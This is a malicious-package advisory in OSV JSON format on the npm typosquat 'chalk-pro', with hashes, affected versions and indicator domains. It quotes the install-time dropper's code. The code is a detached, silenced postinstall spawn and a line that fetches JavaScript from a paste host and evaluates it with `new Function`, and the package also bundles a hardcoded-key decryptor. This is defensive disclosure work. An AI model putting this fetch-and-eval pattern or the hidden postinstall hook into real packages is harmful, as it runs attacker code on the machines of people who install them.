{"id":"MAL-2026-5711","summary":"Malicious code in chalk-pro (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)\nPackage is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs `node lib/utils/index.js`, which uses `child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] })` followed by `child.unref()` to launch `lib/utils/smtp-connection/index.js` as a detached, fully-silenced child so `npm install` returns immediately while the dropper continues in the background. The dropper executes `require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r =\u003e new Function('require', r.data.cookie)(require))` — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with `new Function` at install time, with full access to `require`. A second file (`lib/utils/smtp-connection/parse.js`) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. \nThis is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.\n","modified":"2026-06-16T23:16:57.949188211Z","published":"2026-06-12T20:36:57Z","database_specific":{"malicious-packages-origins":[{"versions":["7.0.4"],"import_time":"2026-06-12T20:49:38.118064947Z","sha256":"ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce","id":"IN-MAL-2026-006231","modified_time":"2026-06-12T20:36:57Z","source":"amazon-inspector"},{"versions":["7.0.4"],"import_time":"2026-06-12T20:49:38.195698931Z","id":"IN-MAL-2026-006232","sha256":"d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070","modified_time":"2026-06-12T20:36:58Z","source":"amazon-inspector"},{"versions":["7.0.6"],"import_time":"2026-06-16T23:03:43.140780104Z","sha256":"75bcaaf15fbc593bdf034886186f961d37758a21b9feca9c18c37338c8af34dc","id":"IN-MAL-2026-006840","modified_time":"2026-06-16T22:17:58Z","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/chalk-pro/v/7.0.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/chalk-pro/v/7.0.6"}],"affected":[{"package":{"name":"chalk-pro","ecosystem":"npm","purl":"pkg:npm/chalk-pro"},"versions":["7.0.4","7.0.6"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/chalk-pro/MAL-2026-5711.json","indicators":{"package_integrity":[{"hashes":{"sha1":"fd1014b20c77e2d2b536d8dcef0187a949438318","sha512_sri":"sha512-m0gHULuyqRGU+Z2ZkyFuCDJD0YUUoENkKlzk5lY1tt97m7zFVP+79dhp4gTNtwyZ0orut7rgi+lEBNGNEWTmbg=="},"filename":"chalk-pro-7.0.4.tgz"}],"domains":["github.com","release-assets.githubusercontent.com","www.jsonkeeper.com"],"evidence_files":[{"sha256":"1177ef44c40c048428ad64bebb0781fdf8ec303a3a4941c225efc143a54d0798","tlsh":"09e026a223e0612e223519e593060067b007c5616b6ae8c6c3585af226c1fd58e23df9","path":"lib/utils/smtp-connection/index.js"},{"sha256":"9fb27c30f484650bb4a39f65a03fbccdc0b9b5f1cb84700ca73ee8893c66e06e","tlsh":"dae0686a23533738a034cbc1da30ce3b258b8020b365a0e0f00c406a2bc72c406ea8da","path":"lib/utils/index.js"},{"sha256":"2b849087b5db4e7663811977e549e5cb0a76d2b3d36c1b8e0e845a45e835a6c4","tlsh":"1041fc15cd268ce3279929edb86d0183b530d00f8d09b85db74c938c4f8e99f76b8a6d","path":"package.json"},{"sha256":"4aac106a4f36aba6433c7ded453d724307ee55616e240883cd46204549cf24b1","tlsh":"7cf0a6802cb8fb900345b0e7c0bbeb07a198a068312287a48a8f9d5a45868488a130dd","path":"lib/utils/smtp-connection/parse.js"}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}